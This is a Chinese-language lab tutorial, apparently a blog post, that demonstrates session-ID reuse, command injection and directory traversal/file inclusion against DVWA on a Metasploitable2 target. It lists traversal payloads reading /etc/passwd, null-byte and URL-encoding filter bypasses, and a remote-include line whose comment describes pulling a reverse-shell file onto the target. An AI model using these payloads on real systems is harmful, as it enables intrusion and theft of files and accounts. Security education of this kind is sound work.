比较常见类型漏洞讲解(一)_常见漏洞的特点及危害
liuian 2025-09-06 06:28 43 浏览
这里介绍一些手动挖掘漏洞时比较容易找到的漏洞,根据不同类型的漏洞来介绍。
演示准备
目标主机:Metasploitable2
攻击目标:目标主机的dvwa系统
攻击机:Kali
SessionId盗用
不知道你们有没有遇到过一些钓鱼链接,我们公司前段时间就收到了好多钓鱼邮件,这些钓鱼邮件多数时候其实是为了获取你的sessionId,不法分子盗取了你特定的sessionId,就相当于获取了你在对应系统中的权限。
这里不对盗取sessionId的过程进行展开,方式有很多,比如钓鱼网站或者钓鱼邮件。在这里主要是演示一下sessionId的使用。
如果本地有sessionId的话,都是存在cookies里面的:
当你未登录时,会给你一个新的sessionId,就算你知道目标url地址,直接访问过去,也会被跳转到登录页或者访客页面。
但当你将这个sessionId改成你已经登录的sessionId,就可以不用登录,直接访问内部地址。
后端对于sessionId的管理机制,对于账户安全影响非常大。比如每个账户的sessionId是否每次都随机生成,每个sessionId的有效性机制等等。
一般现在的系统在logout的时候都会将sessionId失效,所以不要小看系统中的logout按钮。
Command Execution
Command Execution是漏洞类型的名称,翻译过来大概就是命令执行漏洞。当你所能浏览的页面中有一个命令执行框时,你就该尝试一些特殊字符了,比如:“:”、“|”、“>”等等。当你确认被渗透系统的命令输入框存在安全漏洞,可以执行手动传入的特定命令时,我们就可以通过这个入口获取shell,然后提权,然后安装后门等等。
这个执行框的功能目标是对指定ip进行ping连接,检查路由是否通畅。
Command Execution-low
当安全等级为low时,这样输入指令,就能执行我们传入的命令:
可以看一下这个命令执行款在后端对应的逻辑代码:
可以看到后端在接收到操作者输入的指令后,没有做任何检验判断,直接组装成了命令进行执行。
Command Execution-medium
当安全等级为medium时,我们还是能够执行指定的命令:
看一下这个安全等级后端的实现代码:
可以看到后端虽然对接受的命令做了一些校验判断,但是还是有些漏网之鱼可以绕过校验,比如“|”、“&”等等。
Command Execution-high
将安全等级调到high,基本找不到执行我们传入命令的方式:
看一下逻辑代码:
可以看到,代码中将传入的字符串通过“.”进行了拆分,然后对拆分后的每一个部分都进行了判断,只有判断成功后才会重新组装成ip,对这个组装后的ip进行ping操作。这样就杜绝了传入一些尾巴一起被执行的漏洞。
Directory traversal / File include
Directory traversal 和 File include 严格来说这是两个漏洞类型,但是多数时候他们的表现形式非常相似,都有可能导致信息泄漏。
Directory traversal 翻译后是目录权限限制不严的意思。比如你能从当前服务对应的目录访问到/etc/passwd文件,就会暴露一下账户信息。
File include 翻译后是文件包含。有些编程语言提供了include方法,可以直接调用到其他目录的文件,也许是本地目录,也可能是其他主机的目录。
演示前,将靶机的/etc/php5/cgi/php.ini文件里的配置改一下:
配置修改成功后,要将重启服务:
找这类漏洞的时候可以特别关注一下这类特征:?变量=文件名
这类漏洞不绝对带有明显特征,但是多数情况下都带有这类特征。
比较经典的攻击方式:
# 如果不清楚当前具体位置,就多加一些../就行,因为到根目录后返回上层还是根目录
?page=../../etc/passwd
?page=file:///etc/passwd
# 从这里可以读取到一些源码,不能确定会造成多大危害
?home=main.cgi
# 这里可以弄个反弹shell的可执行文件,把地址传给靶机,靶机执行后我们就可以获取靶机的shell
?page=http://www.a.com/1.php 当后端做了一些校验判断,进行了字符过滤的时候,可以尝试在传参最后加这些特殊字符:
- “.”
- “%00”
比如这样传“?page=/etc/passwd%00.php”,在php的后端校验中,也许就绕过校验了。这些都是编程语言本身特性决定的,所以确认目标系统后端是用什么语言实现的,对于渗透工作也是很有帮助的。
让后端校验判断非常完善的时候,还可以试试将命令转码,例如:
url编码、双层url编码
%2e%2e%2f 解码:../
%2e%2e%5c 解码:..\
%252e%252e%255c 解码:..\
Unicode/UTF-8编码
..%c0%af 解码:../
..%c1%9c 解码:..\也许就绕过后端的校验了。
网上也有同学整理过一些经验,当你无法直接访问到你指定的文件时,可以这样尝试:
# 在结尾处加一些英文句号
?page=/etc/passwd...
# 在结尾处加多个空格
?page=/etc/passwd<spaces>
# 在结尾处加引号
?page=/etc/passwd""""""
# 在结尾处加一些尖括号
?page=/etc/passwd<<>><<>
# 在同层级目录中跳转几次
?page=./././passwd
# 在不同层级目录之间跳转一次
?page=ppp/../passwd这些方式往往会产生意想不到的效果。
kali作为专业渗透的集大成者,在里面也存放了这类漏洞的字典,可以参考使用:
Directory traversal / File include-low
看一下安全等级low的时候,利用这个漏洞:
如果这个漏洞是单纯的Directory traversal,直接传/etc/passwd是无法获取到信息的,需要其他传参才能获取到用户信息。
可以看一下这个安全等级下的逻辑代码:
对于入参没有做任何的校验判断。
Directory traversal / File include-medium
当安全等级medium的时候,利用这个漏洞:
看一下代码:
虽然做了校验,但是校验方式比较粗糙,没有起到很好的防护作用。而且看检验方式,好像能直接访问指定地址,在kali开一个监听:
将kali的地址作为参数传递,但是后端将“http://”替换成了“”,所以要在被替换字段里面加一个“http://”:
可以看到kali已经收到了请求:
虽然不能直接从靶机传一个shell过来,但是可以从kali传一些木马到靶机,然后想办法触发木马进一步控制靶机。
或者还可以这样,在kali的var/www/html中新建一个文件a.txt:
启动kali中的apache服务:
然后就可以将命令传递给靶机,得到执行结果了:
Directory traversal / File include-high
当安全等级high的时候,利用这个漏洞:
看一下代码:
校验的时候直接写死了,只能传include.php才能显示,不然就提示为找不到文件。真的这样写的话,其实都不需要传这个page参数,直接写死就行了。
最后提一下这种类型的漏洞不一定仅仅在url中,也可能在headers里面,所以做渗透测试的时候要多翻一翻,不要墨守成规。
相关推荐
- 搭建一个20人的办公网络(适用于20多人的小型办公网络环境)
-
楼主有5台机上网,则需要一个8口路由器,组网方法如下:设备:1、8口路由器一台,其中8口为LAN(局域网)端口,一个WAN(广域网)端口,价格100--400元2、网线N米,这个你自己会看了:)...
- 笔记本电脑各种参数介绍(笔记本电脑各项参数新手普及知识)
-
1、CPU:这个主要取决于频率和二级缓存,频率越高、二级缓存越大,速度越快,现在的CPU有三级缓存、四级缓存等,都影响相应速度。2、内存:内存的存取速度取决于接口、颗粒数量多少与储存大小,一般来说,内...
- 汉字上面带拼音输入法下载(字上面带拼音的输入法是哪个)
-
使用手机上的拼音输入法打成汉字的方法如下:1.打开手机上的拼音输入法,在输入框中输入汉字的拼音,例如“nihao”。2.根据输入法提示的候选词,选择正确的汉字。例如,如果输入“nihao”,输...
- xpsp3安装版系统下载(windowsxpsp3安装教程)
-
xpsp3纯净版在采用微软封装部署技术的基础上,结合作者的实际工作经验,融合了许多实用的功能。它通过一键分区、一键装系统、自动装驱动、一键设定分辨率,一键填IP,一键Ghost备份(恢复)等一系列...
- 没有备份的手机数据怎么恢复
-
手机没有备份恢复数据方法如下1、使用数据线将手机与电脑连接好,在“我的电脑”中可以看到手机的盘符。 2、将手机开启USB调试模式。在手机设置中找到开发者选项,然后点击“开启USB调试模式”。 3、...
- 电脑怎么激活windows11专业版
-
win11专业版激活方法有多种,以下提供两种常用的激活方式:方法一:使用激活密钥激活。在win11桌面上右键点击“此电脑”,选择“属性”选项。进入属性页面后,点击“更改产品密钥或升级windows”。...
- 华为手机助手下载官网(华为手机助手app下载专区)
-
华为手机助手策略调整,已不支持从应用市场下载手机助手,目前华为手机助手是需要在电脑上下载或更新手机助手到最新版本,https://consumer.huawei.com/cn/support/his...
- 光纤线断了怎么接(宽带光纤线断了怎么接)
-
宽带光纤线断了可以重接,具体操作方法如下:1、光纤连接的时候要根据束管内,同色相连,同芯相连,按顺序进行连接,由大到小。一般有三种连接方法,分别是熔接、活动连接和机械连接。2、连接的时候要开剥光缆,抛...
- win7旗舰版和专业版区别(win7旗舰版跟专业版)
-
1、功能区别:Win7旗舰版比专业版多了三个功能,分别是Bitlocker、BitlockerToGo和多语言界面; 2、用途区别:旗舰版的功能是所有版本中最全最强大的,占用的系统资源,...
- 万能连接钥匙(万能wifi连接钥匙下载)
-
1、首先打开wifi万能钥匙软件,若手机没有开启WLAN,就根据软件提示打开WLAN开关;2、打开WLAN开关后,会显示附近的WiFi,如果知道密码,可点击相应WiFi后点击‘输入密码’连接;3、若不...
- 雨林木风音乐叫什么(雨林木风是啥)
-
雨林木风的创始人是陈年鑫先生。陈年鑫先生于1999年创立了雨林木风公司,其初衷是为满足中国市场对高品质、高性能电脑的需求。在陈年鑫先生的领导下,雨林木风以技术创新、产品质量和客户服务为核心价值,不断推...
- aics6序列号永久序列号(aics6破解序列号)
-
关于AICS6这个版本,虽然是比较久远的版本,但是在功能上也是十分全面和强大的,作为一名平面设计师的话,AICS6的现有的功能已经能够应付几乎所有的设计工作了……到底AICC2019的功能是不是...
- 手机可以装电脑系统吗(手机可以装电脑系统吗怎么装)
-
答题公式1:手机可以通过数据线或无线连接的方式给电脑装系统。手机安装系统需要一定的技巧和软件支持,一般需要通过数据线或无线连接的方式与电脑连接,并下载相应的软件和系统文件进行安装。对于大部分手机用户来...
- 一周热门
- 最近发表
- 标签列表
-
- python判断字典是否为空 (50)
- crontab每周一执行 (48)
- aes和des区别 (43)
- bash脚本和shell脚本的区别 (35)
- canvas库 (33)
- dataframe筛选满足条件的行 (35)
- gitlab日志 (33)
- lua xpcall (36)
- blob转json (33)
- python判断是否在列表中 (34)
- python html转pdf (36)
- 安装指定版本npm (37)
- idea搜索jar包内容 (33)
- css鼠标悬停出现隐藏的文字 (34)
- linux nacos启动命令 (33)
- gitlab 日志 (36)
- adb pull (37)
- python判断元素在不在列表里 (34)
- python 字典删除元素 (34)
- vscode切换git分支 (35)
- python bytes转16进制 (35)
- grep前后几行 (34)
- hashmap转list (35)
- c++ 字符串查找 (35)
- mysql刷新权限 (34)
